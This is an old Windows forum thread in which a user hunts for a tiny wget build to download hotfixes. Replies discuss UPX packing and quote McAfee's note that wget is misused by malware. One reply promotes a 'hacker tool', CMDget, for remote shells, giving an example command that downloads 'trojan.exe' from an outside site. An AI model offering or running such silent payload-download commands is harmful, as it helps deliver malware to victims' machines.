Jump to content

WGET & MD5


GreenMachine
 Share

Recommended Posts

HELP!

Somebody on this forum (I first thought Bilou_Gateux, then Jjazz) suggested I use WGET to download the hotfixes, and posted a link to a VERY, VERY small version of WGET. This version was one used by virus/trojans, that would silently download a file, and then silently launch the program. The file size was, as I said, very, very small: under 10 Kb. The same person also posted a link to an equally small MD5 CheckSum routine, again under 5 Kb. The WGET routine also showed up in McAfee as a trojan/virus.

I've been searching for a few hours now, and I cannot find the post, the copy of the files I thought I had, or a link to these miniscule versions.

If anyone has a link to the post or the files, or would be so kind as to zip and attach the files, they will "make my day".

Anyone?

Link to comment
Share on other sites


Thanks much, swampy.

The version I seem to remember (and I'm loosing my mind trying to find) was wicked small. I think it had very limited functionality, but it would do just what I need. I'm sure someone posted it on the XPCREATE forum, and I'm going nuts trying to find it.

I guess it's bedtime in this northern, western hemisphere: maybe my memory/eyes/search will work better tomorrow.

Thanks again for posting, and the link.

Link to comment
Share on other sites

They probably did customize a version of wget, and then compressed it with UPX or something similar.

I can't find a miniature version of wget, lynx, or curl for windows. :\ So I tested compressing it myself:

http://www.interlog.com/~tcharron/wgetwin.html

wget 1.5.3: compresses to 76k with UPX. I can't find anything smaller at the moment, but I will keep an eye out.

Link to comment
Share on other sites

Thanks, Virindi. I'm begining to wonder if that post has been deleted. I think it was near a post you did that mentioned the UPX compressed version. The one I saw was very very small: I thnk only a few Kbyte. Somehow that file lead me to a site, and there was also a small FTP/Web server, which make me think of the Worm/Trojan aspect. This WGET version also launched the downloaded file, as an option. It also seemed to do little else, other than download: that is what I am looking for the HotFix downloader. WGET has many options, most of which I would not need. I do think it was Jjazz that had posted it. (Where are you, Jjazz? Vacation time in France?)

Thanks again for the reply, but I really do want to find that version. I guess I'll just keep bumping these posts till I get it!

Link to comment
Share on other sites

Sorry, I don't. I've also been googling +trojan +wget +"web server" +tutorial, in varying combinations. Checked with the AV sites, etc ... Now I'm in the process of reading every thread in this forum. Boring ...

Thanks for the suggestion!

Link to comment
Share on other sites

not a reduced wget.exe version but a hacker tool which do his job fine :

CMDget.exe - 1.5kb - Downloads a file from a website from user provided parameters

( Example: CMDGet http://illmob.org/trojan.exe c:\>owned.exe )

md5.exe - 15kb - gets the md5 hash of a file

small collection of tool i use regularly in a remote shell/cmd prompt

CMDget.exe

PM sent ;)

Link to comment
Share on other sites

The following is an excerpt from McAfee.com:

Threat Profile: Tool-WGet

Risk Assessment

- Home Users: N/A

- Corporate Users: N/A

Date Discovered: 8/1/2002

Date Added: 3/17/2004

Origin: Unknown

Length: Varies

Type: Program

SubType: Win32

DAT Required: 4218

Program Characteristics

This is not a virus or trojan. It is a legitimate application for retrieving files from the Internet via HTTP and FTP. The application has been misused by certain pieces of malware in order to facilitate remote downloads.

The exact file size varies (there are many different versions), and it may be packed with a PE packer (eg. UPX, Aspack). Malware that use this tool maliciously typically do so using the quiet switch, disabling screen output.

Users who would like to check for the presence of potentially unwanted programs on their system should run the command line scanner with the /PROGRAM switch.

Please note that VirusScan 7, and higher, has an option that enables users to detect this kind of program automatically (see below).

Symptoms

N/A This is not a virus or trojan. It is a legitimate application which enables remote files to be downloaded from the Internet via HTTP or FTP.

Removal Instructions

For VirusScan 4.x users who would like to detect this program on their system, they can run the command line scanner with the /PROGRAM switch.

Click the START button

Click RUN

Type COMMAND and hit ENTER

Type:

c:\progra~1\common~1\networ~1\viruss~1\4.0.xx\scan.exe c: /program /sub

and hit ENTER.

Users running VirusScan 7 or later can also enable application or joke detection via the configuration option "Find potentially unwanted programs" (Advanced section - see example below), within the VirusScan GUI as shown below:

Corporate Users:

This applies for the VirusScan 7 Enterprise On-Access scanner too.

Retail Users:

This does not apply for the VirusScan 7 Retail On-Access scanner.

(Pictures omitted.) HTH.

For a link to the exact place at McAfee.com:

W-Get virus information.

*edit* google search for: PE Packer W-Get

Link to comment
Share on other sites

I also found this too, http://www.msfn.org/board/index.php?act=ST&f=80&t=16094 not sure if that's what your looking for or not, both Aaron and Bombtrack mention it. Bombtrack has the instructions for it in his post. Not sure if that's what your looking for though or not. When you do the search use W-Get that may help you find what your looking for.

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.


×
×
  • Create New...